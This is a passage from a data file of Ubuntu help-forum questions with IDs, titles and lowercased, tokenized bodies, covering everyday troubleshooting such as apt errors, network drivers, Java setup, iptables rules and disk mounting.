earlier kernels and live cd but the problem persists , however booting into windows 8 internet works no problem . update : the problem is with the on-board ethernet port . i put in another ethernet card ( eth1 in ifconfig above ) and it 's working fine .
423483	problem in installing build-essential on ubuntu 12.04	i want to install the build-essential package . i have tried with : sudo apt-get install build-essential but i get an error of package not found . i think this error is probably due to firewalled network of my company . so i tried to download its debian package . when i run it , it gives me a dependency error on g++4.6 . so i try to install g++4.6 , but it depends on libstdc++6-4.6 . then i try to install this library , but this one has a dependency on g++4.6 . so now i am confused to how to do this . please help me. ! ! !
423493	hibernation fails , after trying to repair no-wlan-problem	after noticing that my ubuntu 13.04 had no wlan function after resuming from hibernation , i tried the sudo restart network-manager as explained in this question : no wlan after standby . it brought back the wlan functionality so i decided to write the following script # ! /bin/sh # /usr/lib/pm-utils/sleep.d/49_restart_network-manager # action script to restart network-manager of pm-action events . written feb 19,2014 case `` $ 1 '' in resume|thaw ) restart network-manager ; ; esac saved it as /usr/lib/pm-utils/sleep.d/49_restart_network-manager and applied a sudo chmod +x on it to make it executable . now i 've tryed to put my computer in hibernation , but it only reaches the lock screen . now i 've decided to delete the file and tried hibernating it ... again it only reached the lock screen which normally appeared after it switched of and i turned it on ... then i tryed $ sudo pm-hibernation and there was no result apart from : $ sudo pm-hibernation [ sudo ] password for 'user ' : $ how can i make my system hibernate again ? p.s . i have a copy of the script saved in a folder of my ~/documents directory where i save all stuff that has helped me 'pimp ' my system . does this affects hibernation ?
423495	cleanly shutdown on read-only root partition - cant sudo	my /dev/sda dropped out for some reason on my server box ( 12.04.4 ) . this made ubuntu remount it as ro which is fine but now i can not shutdown the system cleanly . is there any way to deal with this ? sudo and su commands do not work since the fs is ro . i have a mdadm array id like to stop cleanly .
423496	error when recompiling python	im trying to recompile python 2.7 on ubuntu 12.04 , i already installed libsqlite3-dev ' and then i proceeded to to this : $ python python 2.7.4 ( default , apr 19 2013 , 18:28:01 ) [ gcc 4.7.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > import sqlite3 and then i get this error : traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/local/lib/python2.7/sqlite3/__init__.py '' , line 24 , in < module > from dbapi2 import * file `` /usr/local/lib/python2.7/sqlite3/dbapi2.py '' , line 27 , in < module > from _sqlite3 import * importerror : no module named _sqlite3 so , how do i recompile python ?
423497	after installing 13.10 getting error with sudo apt-get update	my ubuntu version is 13.10 . which command should i use ? these happens when i write following command ... jinal @ ubuntu : ~ $ sudo apt-get update [ sudo ] password for jinal : reading package lists ... done w : gpg error : http : //us.archive.ubuntu.com saucy release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > jinal @ ubuntu : ~ $ sudo apt-get install update reading package lists ... done building dependency tree reading state information ... done e : unable to locate package update jinal @ ubuntu : ~ $ in terminal when i write the command sudo apt-get update then it works and start updating.but when it finishes an error line such as invalid comes.then when i write the command to install updates that is sudo apt-get install update at that time the error comes : - ( e : \ unable to locate ) please help me how to get put of these ? ?
423498	cloud ( dropbox ) , symlinks , to windows partition	i have just signed in so i 'm a newbie here ... i 've tries googling for a couple of hours but i am now stuck with lots of questions in my head being new to linux ... i just love symbolic links ( best thing invented next to slice bread for me ) , i just do n't know how it will work well with linux ( ext ) and windows ( ntfs ) ... im using an old dell laptop now my current status is i have a very low storage capacity ( 100gb~ something ) ( 5.7gb ) ( primary ) ( has a windows installer in it ) ( 90gb ) ( primary ) ( windows 8.1 ) ( 500mb~ ) ( primary ) ( system reserve ) sucks ! ( 16gb ) ( ext ) ( linux ) ( 4.1gb swap ) note : i do n't want to reformat the whole drive just to create a seperate storage partition because it 's a pain what i want to do is : i have a dropbox on my windows partition c : \users\me\dropbox i want to mout that partition on ubuntu and link it to say ./home/me/dropbox so that i can save space . my question is , is it safe ? or will it even work ? second is : my linux partition only has 9gb free space wherein my windows partition have < 50gb~ left i want to create a folder on windows say c : \shared_on_linux now if the windows partition is mounted on linux , question is , is it okay to read and write on that folder ? wo n't it ruin something on windows ? i do n't know how these two handle their files . i know someone said that `` one test is worth a thousand expert opinions '' but i just don't want a catasthropic failure ... thanks in advance
423499	gpg error : invalid signatures	i get an error when i tried to install synaptic manager from gui tool library in ubuntu12.04 the error is like this : gpg error : http : //extras.ubuntu.com precise release : the following signatures are invalid : nodata1 nodata2 can anybody help in solving this error and how to download synaptic manager. ? thanks
423502	terminal window does not contain username with only prompt	i was sourcing a file to install openfoam after long time also my user name in terminal did n't come up as i have attached a snap shot i can see only prompt . how to resolve this ?
423503	ubuntu 12.04 and 13.10 freeze and white screen with nvidia gtx 660	i 've been trying to get ubuntu to work ( dual booted with win7 ) on my new computer for a week now and have not found a working solution . system specs : intel core i7-4771 @ 3.50 ghz 250 gb ssd samsung 840 evo 16 gb ram nvidia geforce gtx 660 the last item is the suspected culprit ... i first installed 12.04 which worked fine ( but did not detect my nvidia card ) until it updated , then one of two things happened ( i have reinstalled 12.04 several times ) : 1 ) i got a white screen but with the mouse visible , and it was possible to open a graphical terminal with ctrl-t and run programs from there . 2 ) after updating the nvidia driver i got a completely black screen and could not even open a terminal using ctrl-alt-f1 . i then tried installing 13.10 but it freezes on splash screen and i can not use ctrl-alt-f1 to open a terminal . i ca n't even get the keyboard to work in failsafe mode ! i 'm not familiar with debugging this kind of problem and would really appreciate help . as it is now i ca n't use ubuntu , which is a shame ...
423505	need to free up space on windows 7 - ok to remove ubtuntu root disks stored on that os ?	novice alert i 'm running two os on my laptop : ubuntu 13.10 and windows 7 . i 've got to the point where i must free up some space on the windows os . the main folder that 's eating up space currently is the one containing all the ubuntu install files , including the root disks . my ( probably very naive ) question is ... will removing this folder on the windows 7 os affect or screw up anything on the ubuntu os ? as far as i can tell , it was just used for installation purposes , and is therefore now obsolete . advice much appreciated . thanks .
423508	can i directly download audio using youtube-dl ?	can i directly download audio from a youtube video instead of first downloading audio+video and then extracting the audio ?
423509	need help with an script executed in terminal	can anybody tell me what is wrong in this script ? `for i in { 1..7 } ; do for j in { 1..5 } ; $ a = $ ix630 ; $ y = $ jx900 ; do mogrify -crop $ ax $ y+675+900 +repage /home/vas/documents/web_design/mold % 20isef % 202014/poster/ready/body_final.png ; done ; done`
423514	how to enable mod_rewrite for virtual host	the mod_rewrite rule is not working on the virtual host . i have wanted this for cakephp . is there setting to add in the virtual host file ?
423518	is there code example or api reference for “convergence” ?	i can not find any code example for writing apps for “convergence” . does anyone know it where i could find any ? or will anyone give some clue about how to write a convergence app for both phone and pc ? thank you !
423522	top menu disappearing when enabling unity plugin in compiz	i suddenly encountered a problem the other day where my top menu completely disappeared . i could not figure out how to restore it but then i managed to get it back by loading up compizconfig settings and de-selecting `` enable ubuntu unity plugin '' . however , this then removes the unity panel on the left . my question is , how can i get both working again at the same time ? i have tried a few attempts at fixing this including resetting unity but it does n't fix this . i am thinking it might be a conflict thing , there was a pop-up asking me if i wanted to resolve conflicts when i first enabled the unity plugin , but that does n't seem to fix it . i have tried looking at other threads but they do n't seem to be addressing the same concern as me . i temporally got them both working when i tried resetting the gnome-panel ( from this post : how to reset gnome panel ? ) dconf reset -f /org/gnome/gnome-panel/ killall gnome-panel then typing in gnome-panel it works temporarily as when i restart or close the terminal the problem is the same again . here is the output of the command `` gnome-panel '' : gregory @ gregory-hp-pavilion-dm4-notebook-pc : ~ $ gnome-panel ( gnome-panel:4800 ) : gtk-critical ** : gtk_accelerator_parse_with_keycode : assertion 'accelerator ! = null ' failed ** ( gnome-panel:4800 ) : warning ** : unable to parse mouse modifier ' ( null ) ' ( gnome-panel:4800 ) : gtk-critical ** : gtk_accelerator_parse_with_keycode : assertion 'accelerator ! = null ' failed ** ( gnome-panel:4800 ) : warning ** : unable to parse mouse modifier ' ( null ) ' *** bug *** in pixman_region32_init_rect : invalid rectangle passed set a breakpoint on '_pixman_log_error ' to debug *** bug *** in pixman_region32_init_rect : invalid rectangle passed set a breakpoint on '_pixman_log_error ' to debug i am running ubuntu 13.10 . any help will be much appreciated . thank you
423524	i want to get a file to my device using ftpget command from a server	the server ip is 192.168.0.100 username : client password : client i typed the command as from the device ftpget -u client -p client 192.168.0.100 /home/client/filename but it is not working
423526	alternative stand-alone virtual desktop manager for ubuntu 12.04 - desktop x86-64	i 'm running ubuntu 12.04 - desktop x86-64 and would like to install a stand-alone virtual desktop manager for managing my workspaces . what i mean by stand-alone is that it 's not integrated into the taskbar or dock like the default manager is . it would have it 's own window like any other program does . i 've googled around but ca n't find any .
423528	mirroring hard disk	i am using ubuntu 12.4 as a server consisting of 500gb of hard disk the space of that hard disk is now decreased to 187gb as a free space i like to expand my hard disk by fixing new 1tb hard disk but i need all the data in my old had disk should be copied to the new one and i also want to enable mirroring on those disk as raid 1 is that possible kindly explain me . hardware mirroring and software mirroring what is the difference between those mirroring .
423529	how to efficiently switch between several terminal windows using the keyboard ?	alt+tab lets me only switch between windows belonging to different applications . i often use about four terminal bound applications at the same time ( e.g . ipython , vim , fish for system and fish for git ) . even using the mouse , clicking the terminal icon on the launcher being offered takes time to decide which is which . but i do n't know so far any way to switch in this case using my keyboard only . how to handle multiple terminals ( and instances of same application in general ) efficiently using the keyboard ? with respect to the terminal special case - is there a terminal application allowing sperate terminals in tabs ? and the oscar goes to ... tmux
423530	ca n't change my mac address - ca n't assign requested address	i wonder , why ca n't i change my mac address by doing this : sudo ifconfig wlan0 down sudo ifconfig wlan0 hw ether 03 : a0:04 : d3:00:11 the error is siocsifhwaddr : can not assign requested address i googled but found nothing valuable . p.s as usual , i ca n't do this . nothing works . i took the new mac address which was incremented by 1 from my current one ( old 11:11:11:11:11 : cf , new 11:11:11:11:11 : d0 ) sudo ifconfig wlan0 down sudo ifconfig wlan0 hw ether 11:11:11:11:11 : d0 there was no error , it even connected to wifi automatically after i did this ( even though i did n't do sudo ifconfig wlan0 up ) . i though it won . however , when i did sudo ip addr i 've seen the same mac address as it had before . nothing was changed .
423531	stuck at configuring-apt during install of ubuntu server 12.04.4	i 'm installing ubuntu server 12.04.4 , and i 'm stuck at configuring-apt for quite sometime now . what does configuring-apt do , and is it necessary . it seems to be downloading things . is it necessary to let this run ? what does it download and does it install everything it downloads ? i do n't want anything installed since i need a bare bones system . i 'm installing on oracles virtual box .
423537	technotrend ct-3650 not working after some time idle	on my htpc i installed ubuntu saucy salamender and mythtv . i connected my technotrend ct-3650 for watching dvb-c . the setup runs fine . however , after some idle time ( e.g. , i stop live tv in die evening and try to start it the next day again ) the technotrend dvb-c receiver does not work . if i do not stop live tv during the night , it runs without problems for days . after removing the module ( rmmod dvb_usb_ttusb2 ) and loading it again ( modprobe dvb_usb_ttusb2 ) the receiver works again . the computer is not going to standby or suspend because it runs asterisk pbx , too . i do not find any strange messages in the log file . any ideas ? best regards , frank
423539	asus zenbook u500vz support ?	what is the current status of ubuntu support for the asus zenbook u500vz ?
423545	login to black screen with cursor	sometimes , after login , it goes to a black screen without any hard disk activity while mouse cursor works . i login to the terminal by pressing ctrl + alt + f4 and restart the x server using this command sudo restart lightdm then login screen appears again and this time it goes to desktop after login . how can i find the problem ? i looked at system log but could n't find any special thing .
423548	how do i make a file default opened by the terminal on double click ?	this is my file , which i saved as eclipse-start.sh https : //gist.github.com/meai1/d02bc20836f97f6ecb3e i also made it executable . but it always starts in gedit ? ?
423550	wired behaviour of php soap webservice on ubuntu and apache2	we got a soap webservice written in php . we also got phpunit tests for this webservice . till last week we used xampp on ubuntu 12.04.4 . using xampp the webservice worked fine . then last week we decided to use lamp instead . we removed xampp and installed lamp : sudo apt-get install apache2 php5 php5-mysql mysql-server since then my soap webservice behaves very strange ! every time i execute the same phpunit tests i 'm getting different results . but we got this problem only on my computer . we tried to execute the tests on another computer , calling my soap webservice - same result . i removed and installed lamp a couple of times , without any success . does anyone have any idea , what the problem could be ? if you need any further information or config files etc . please tell me . solved ! solution : in the soap webservice we were using php classes , php casted the webservice request ( stdclass object ) to our custom classes . we never thought that might be a problem , course there where no errors thrown . but anyway , after we manually converted the stdclass objects in our custom objects , everything seems to work as expected . we still have no clue why it worked on one machine , and not on the other . thanks for your help !
423551	vostro 2520 wifi driver update , but how ?	i have a dell vostro 2520 . i have installed ubuntu13 - saucy salamander with wubi in my laptop . it also has windows 8 . i do n't have my wifi drivers updated.i have read this somewhere , but got the following result . root @ ubuntu : /home/kris # sudo apt-get install bcmwl-kernel-source e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
423558	how do i get oracle java se 7 to work ?	i am a newbie to ubuntu , so kindly be considerate . i recently manually downloaded & installed ( java se 7ux ) javase 1.7.0_51 . linux x64 ( for 64-bit system ) `` tar.gz '' package . my ubuntu version is 13.10 ( os 64 bit ) i carefully following the instructions from : how to install jdk 7 on ubuntu to verify that the installation was successful i wrote : javac -version and get the below results : error occurred during initialization of vm java/lang/noclassdeffounderror : java/lang/object $ which java gives the below results : /usr/bin/java $ which javac also gives the below results : /usr/bin/javac i repeated the steps a couple of times just in case i missed out an important step but still got the same results . after a couple of researching on-line i found out @ reference , that i could actually install java on ubuntu via ppa repository . after the installation when i $ java -version i still get : error occurred during initialization of vm java/lang/noclassdeffounderror : java/lang/object however when i $ cd /usr/bin $ ls -ld java* i get : lrwxrwxrwx 1 root root 22 feb 19 19:06 java - > /etc/alternatives/java lrwxrwxrwx 1 root root 23 feb 17 02:15 javac - > /etc/alternatives/javac lrwxrwxrwx 1 root root 25 feb 19 20:09 javadoc - > /etc/alternatives/javadoc lrwxrwxrwx 1 root root 32 feb 19 20:09 javafxpackager - > /etc/alternatives/javafxpackager lrwxrwxrwx 1 root root 23 feb 19 20:09 javah - > /etc/alternatives/javah lrwxrwxrwx 1 root root 23 feb 19 20:09 javap - > /etc/alternatives/javap lrwxrwxrwx 1 root root 25 feb 19 20:09 java_vm - > /etc/alternatives/java_vm lrwxrwxrwx 1 root root 24 feb 17 02:15 javaws - > /etc/alternatives/javaws also similar to : $ cd /etc/alternatives $ ls -ld java* lrwxrwxrwx 1 root root 36 feb 19 19:15 java - > /usr/local/java/jdk1.7.0_51/bin/java lrwxrwxrwx 1 root root 37 feb 17 02:15 javac - > /usr/local/java/jdk1.7.0_51/bin/javac lrwxrwxrwx 1 root root 38 feb 19 20:09 javadoc - > /usr/lib/jvm/java-7-oracle/bin/javadoc lrwxrwxrwx 1 root root 48 feb 19 20:09 javadoc.1.gz - > /usr/lib/jvm/java-7-oracle/man/man1/javadoc.1.gz lrwxrwxrwx 1 root root 45 feb 19 20:09 javafxpackager - > /usr/lib/jvm/java-7-oracle/bin/javafxpackager lrwxrwxrwx 1 root root 55 feb 19 20:09 javafxpackager.1.gz - > /usr/lib/jvm/java-7-oracle/man/man1/javafxpackager.1.gz lrwxrwxrwx 1 root root 36 feb 19 20:09 javah - > /usr/lib/jvm/java-7-oracle/bin/javah lrwxrwxrwx 1 root root 46 feb 19 20:09 javah.1.gz - > /usr/lib/jvm/java-7-oracle/man/man1/javah.1.gz lrwxrwxrwx 1 root root 36 feb 19 20:09 javap - > /usr/lib/jvm/java-7-oracle/bin/javap lrwxrwxrwx 1 root root 46 feb 19 20:09 javap.1.gz - > /usr/lib/jvm/java-7-oracle/man/man1/javap.1.gz lrwxrwxrwx 1 root root 42 feb 19 20:09 java_vm - > /usr/lib/jvm/java-7-oracle/jre/bin/java_vm lrwxrwxrwx 1 root root 42 feb 17 02:15 javaws - > /usr/local/java/jdk1.7.0_51/jre/bin/javaws note that javadoc.1.gz - > /usr/lib/jvm/java-7-oracle/man/man1/javadoc.1.gz javafxpackager.1.gz - > /usr/lib/jvm/java-7-oracle/man/man1/javafxpackager.1.gz javah.1.gz - > /usr/lib/jvm/java-7-oracle/man/man1/javah.1.gz javah.1.gz - > /usr/lib/jvm/java-7-oracle/man/man1/javah.1.gz ... are all in red what does all this mean and most importantly how do i make my java installation work ? looking forward to you help !
423561	xen vps ubuntu 12.04 lts : how do i create a development copy of this server ?	i have a working , extremely complex ubuntu 12.04 lts server installed as a vps under a xen supervisor . it includes database server , varnish , memcached , vpn ( both ipsec and openvpn ) and many , many other services including dns , mail etc ( no , i ca n't split services on 2 servers for now ) . now , i need to change portions of its web pages , change database tables structures etc . etc . i 'd like to do that on a `` mirror '' of that server on a separate , other vps instance , to be installed maybe as `` dev.domain.tld '' . i 'd then proceed updating changes made to the dev machine to the production one . is there someone who could give me hints about how to best and quickest do this ? i guess the host provider would create me a 1:1 copy of the instance , but then i ca n't use it because it 'd have the same ip address , the same hostname and such . are there utilities or anything to help me perform the needed changes to have two working , separated servers ? i know this is really a broad question but there has to be someone in the world who stumbled upon this issue and found a way to rationally do it .
423566	my sshd_config file is empty is this correct ?	i just finished installing ubuntu server 12.04.4 and was setting up ssh . when i did $ sudo vi etc/ssh/sshd_config i get something with no lines and the words [ new directory ] is this the way it should be ? my ssh_config file is ok . there 's text in it . did i go wrong anywhere ? how do i set this right ?
423570	ubuntu 12.04 wireless problem hp pavilion	i 'm not able to enable wireless using the hardware switch -f12- on my hp pavilion dv6-7080-se . the enable wireless option is greyd out so i can not enable it . while starting ubuntu when i press f12 -which starts wifi drive- for a login time the wifi works . the results of iwconfig for my system are as follows eth0 no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : on lo no wireless extensions . the result of rfkill list all for my system is as follows 1 : hp-wifi : wireless lan soft blocked : no hard blocked : yes 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : yes 3 : hp-bluetooth : bluetooth soft blocked : no hard blocked : yes 5 : phy0 : wireless lan soft blocked : no hard blocked : no 6 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no here is my sudo lshw -c network result . *-network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0a:00.0 logical name : eth1 version : 01 serial : 08 : ed : b9:26:06:81 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:19 memory : d4500000-d4503fff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0b:00.0 logical name : eth0 version : 07 serial : 08:2e:5f:73:2a : e2 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=192.168.1.2 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : d4404000-d4404fff memory : d4400000-d4403fff lspci -vnn | grep network showed : 0a:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 )
423571	ubuntu 13.10 - could not apply the stored configuration for monitors	upgraded ubuntu from 12.10 to 13.10 . getting error -- could not apply the stored configuration for monitors i deleted monitors.xml in .config , still having same problem . how can i fix this ?
423572	mbk_in_ph command not found while working with alliance cad 5.0	wanted to run commands : mbk_in_ph = ap export mbk_in_ph mbk_out_lo = spi export mbk_out_lo but getting command not found
423573	unable to boot ubuntu from usb in windows 8.1	i could not able to dual boot ubuntu from usb . i am using windows 8.1 and the system was preinstalled with it.my model is lenovo u430p . i disabled the secure boot option and checked it but it did n't work as it always boots windows only . cant able to figure out even after checking the forums.so my question are : is anyone facing the same problem ? can anyone elaborate on the steps and tell where i am going wrong ? thanks in advance
423574	gdm resolution changed when screen lock	i am using ubuntu 12.04 and gdm . however , when the system is idled for a while , it eventually ends up to lock screen . and the resolution is changed to lower resolution when i login again . i need to go to : system setting - > display to set the resolution again . how can i prevent the resolution lowered when ubuntu goto the lock screen ? thanks
423577	tor unable to install keep recieving error msg	tar ( child ) : tor-browser-linux32-3.5.2.1_en-us.tar.xz : can not open : no such file or directory i have followed the steps : make a backup copy of your current sources.list file sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak append new line of text to current sources.list file cli echo `` new line of text '' | sudo tee -a /etc/apt/sources.list gui ( text editor ) sudo gedit /etc/apt/sources.list paste new line of text on new line at end of current sources.list text file in text editor . save and close sources.list do n't forget to update in order to use the new repository sudo apt-get update ( found here how do i add a line to my /etc/apt/sources.list ? ) so i come back to this step : download the architecture-appropriate file above , save it somewhere , then run one of the following two commands to extract the package archive : tar -xvjf tor-browser-linux32-3.5.2.1_en-us.tar.xz ( found here https : //www.torproject.org/projects/torbrowser.html.en ) but i keep getting tar ( child ) : tor-browser-linux32-3.5.2.1_en-us.tar.xz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now
423583	how to enable ipv6 support in linux system	i am trying to enable ipv6 support to my linux system . im trying to modify /proc/sys/net/ipv6/conf/all/disable_ipv6 this file but system is not allowing to do so .
423584	show only few lines after match pattern found in vi editor	i would like to see only first 5 lines after the match found in vi editor . what is the command ? i only know these commands /incident id : gives all lines from first to last : g/incident id : gives only the match word hiding all non match but how to show first 5 lines after the match word found ... ? example with expected output : i have text of 8 lines , & i search for incident id incident id : 1392875740716 < < < match word here url : /project/jsps/errorpage.jsp java.lang.nullpointerexception at java.util.calendar.settime ( calendar.java:1092 ) at com.cando.restaurant.utils.daterange.createforweek ( daterange.java:54 ) at org.springframework.transaction.interceptor.transactioninterceptor :110 ) at org.springframework.aop.framework.reflectivemethodinvocation at org.springframework.aop.interceptor.exposeinvocationinterceptor expected output incident id : 1392875740716 < < < match word here url : /project/jsps/errorpage.jsp java.lang.nullpointerexception at java.util.calendar.settime ( calendar.java:1092 ) at com.cando.restaurant.utils.daterange.createforweek ( daterange.java:54 )
423586	off site backups to vps/amazon web services/rackspace	has anybody here ever gone down the line of using hosted services such as aws or rackspace to backup files off site ? was thinking of using duplicity setup on a server and enable backups using gnupg to encrypt the data and ssh to connect . anybody have any comments or better ideas ? thanks community ( forgot to mention the server would be an ubuntu instance )
423590	how can i play video in an always-on-top window ?	i want to watch an exciting announcement while i do other things on my desktop . so , i 'd like to have the video play : in a small window hovering over other windows as i move them around ( `` always on top '' ) ( ideally ) allow click-throughs ( ideally ) be semi-transparent is this possible with totem / vlc / anything else ?
423591	getting errors after setting up apt-mirror	i 've installed apt-mirror following this guide but i 've made a couple of subtle changes as i 've gone along and it has left me unsure how to proceed with the final step of scheduling this via cron . i 've decided i want the downloaded files in a folder structure /var/mirror/ ... as i have plenty of space here , and i changed the apt-mirror config as follows : set base_path /var/mirror set mirror_path $ base_path/www set var_path $ base_path/var set skel_path $ base_path/skel set postmirror_script $ var_path/postmirror.sh if i run sudo apt-mirror it starts downloading ( 40gb , not possible during the day ) so wanted to let it run over night . the file /etc/cron.d/apt-mirror contains : 30 01 * * * apt-mirror /usr/bin/apt-mirror > /var/spool/apt-mirror/var/cron.log this is where i need help . if i run sudo apt-mirror /usr/bin/apt-mirror > /var/spool/apt-mirror/var/cron.log it exits with a configuration error : apt-mirror : invalid line in config file ( 3 : =pod ... ) at /usr/bin/apt-mirror line 297 , < config > line 3 . i think this is because its trying to use /usr/bin/apt-mirror as a config file ( cant get apt-mirror -- help to work , and it gives me a similar error ! ) reading other documents and guides , it appears that /usr/bin/apt-mirror is to set the target location of the downloaded files , but this is not where i want them . i tried changing that to /var/mirror/www but it still gave me the configuration error . so , can anyone either assist me with what the command within cron is actually doing so i can format appropriately , or can anyone confirm if i 'm ok to just use apt-mirror within cron as it appears to work from the command line ?
423594	how can i get my system to email me when a critical issue is encountered , based on command output ?	i would like my linux system to have a script/syslog server such that it first telnets or logs in remotely to my other system , and then executes one command ( e.g . netstat -an ) and if the system found their anything with `` syn_sent '' it should generate an immediate email or sms . how can i set this up ?
423596	can apt-config modify apt config ?	i have tried to change a apt config value with apt-config but without success : apt-config -o apt : :periodic : :unattended-upgrade=1 shell is there a another program on debian / ubuntu with you can customize the configuration ?
423600	lan connection is not working in ubuntu 12.10	my internet is not working even it is not detecting lan connection in ubuntu 12.10 but internet is working properly in windows.please give me some suggestions to overcome this problem .
423601	nautilus slow to load on first attempt	after every restart or shutdown , nautilus takes about 10 sec to load.once loaded , it will start quickly next time . i started nautilus from terminal with sudo access and the error was ** ( nautilus:4298 ) : critical ** : nautilus_menu_provider_get_background_items : assertion `nautilus_is_menu_provider ( provider ) ' failed i tried the solutions given in this question , they do n't help . is there any fix for this error ?
423604	files not visible on my seagate expnsion drive	i am using a 1 tb expansion drive and it has 643.6 gb data used as the properties window says , but there is a folder in there is around 500 gb data which i can not see . it 's properties are showing contents : nothing . now when i am connecting the drive a message appears saying error mounting /dev/sdb1 at /media/gurmeet/seagate expansion drive : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/gurmeet/seagate expansion drive '' ' exited with non-zero exit status 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . please help ...
423607	how to create ubuntu desktop html5 web apps	how to create ubuntu desktop html5 web apps please help me ! ! ! !
423609	bluetooth error	i 'm having another problem : when the pc boots and just when it was supposed to appear the login ( and the password box ) , it appears an bluetooth error : [ 4.936046 ] bluetooth : error in firmware loading err=-110 , len=448 , size=4096 [ 4.936099 ] bluetooth : loading patch file failed i put my pass without seeing the correct screen , click enter and it comes to my desktop as normal . but sometimes during the time i 'm using the pc , the black screen comes again with mores errors . could anyone explain me what is going on and how can i fix the problem ? thanks in advance ,
423612	pip freeze | could not find svn url in dependency_links	i get this error when i run pip freeze : warning : can not find svn location for apsw==3.7.17-r1 ... # # fixme : could not find svn url in dependency_links for this package : apsw==3.7.17-r1 what does this mean ? and how can i fix it ?
423618	how do i change partition sizes on a lubuntu/vista hybrid ?	i have a laptop with vista installed , and i added lubuntu as a side-by-side installation so i could trial it 's performance after testing various other linux distributions , and i 'm finding that lubuntu works surprisingly well . i ca n't format vista as it contains windows-only setups . however i started lubuntu with a 10gb space as i was trialling it and that space is running out , and i know vista has 10/20gb spare . how do i change the partition sizes so i can transfer the extra 10/20gb from the vista os partition to the lubuntu partition ?
423621	how can i get the old newtab in chrome back ?	the newest stable chrome on ubuntu has a really degraded newtab page ; lots of useful features are now unavailable , like `` other devices '' and `` recently closed '' . the search box is not good either . so is there any solution or workaround to get back those features ?
423627	how to make hyper and super keys not do the same thing ?	i have used xkb to remap the right windows key ( rwin ) to hyper_r because i want to use it with autokey for some special shortcuts . i did it by editing /usr/share/x11/xkb/symbols/pc modifying the rwin line : key < rwin > { [ hyper_r ] } ; ( here 's the answer that guided me ) from what i can tell , this works and the right windows key now fires hyper_r . however , it seems that in ubuntu ( xubuntu to be exact ) , hyper and super somehow are doing the same thing . so super + e launches the editor , and so does hyper + e. i 'm not sure why this is or where i can change this behavior . i want hyper and super to be different modifiers .
423630	iptables , order of rules - do i understand it right ?	i would like to configure my vps in the way that it only accepts connections from outside on port 22 ( where sshd listens ) and icmp requests . everything else from outside should be rejected . inside the server , everything should be allowed . do the following rules create the desired behaviour ? # iptables -a input -p all -s 127.0.0.1 -j accept # iptables -a input -p tcp -- dport 22 -j accept # iptabels -a input -p icmp -j accept # iptables -a input -m state -- state established , related -j accept # iptables -a input -p all -j reject i am not completely sure if accept rules will `` win '' over the last overall reject
423637	nautilus uses natural scrolling , while everything else does n't	i 've chosen to use old-fashioned `` reverse '' scrolling , i.e. , pulling downwards on your touchpad gets you further down in the document . this works everywhere in ubuntu , except for in nautilus and in the software update dialogue ( what i 've seen so far ) , which use `` natural '' scrolling . i would like to use `` reverse '' scrolling system-wide . i 'm running ubuntu 13.10 on a thinkpad t430s .
423638	ubuntu 13.10 booting problem	on fresh ubuntu 13.10 installation , on boot it shows black screen with error message . how can i fix this ? gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/f8d8eb7d-2423-4cc5-b0e6-72d47678121e does not exist . dropping to a shell !
423640	firebird - connection refused	whenever i try to connect firebird on my ubuntu 13.10 from my window 7 computer i get an error message saying that the connection was refused . i 'm trying to connect using ibexpert and java . java throws a fbsqlexception saying : gds exception . 33554721 . unable to complete network request to host '10.1.1.8' i was able to connect once then i restarted my ubuntu just to be sure that it 'd keep working but after i restarted it it 's not working anymore . i did telnet localhost and i received the following message : trying 127.0.0.1 telnet : unable to connect to remote host : connection refused i 'm able to ping from my ubuntu to my windows and from my windows to ubuntu with no problem and i 'm able to share file between them using samba without any problem .
423641	why does google chrome not close completely ?	i installed google chrome for flash capability . when i try to close it , it appears to close correctly , but two of the three processes in system monitor remain open . this should not happen . and if chrome is sending information back to google while the browser is closed , i should know about it .
423644	re-install r in ubuntu	i have messed up r 's makeconf file . i tried : sudo apt-get -- purge remove r-base sudo apt-get -- purge remove r-base-dev -- i got r in the first place by doing : sudo apt-get install r-base sudo apt-get install r-base-dev but when i type r r still starts . also the makeconf file is still the one i messed up .
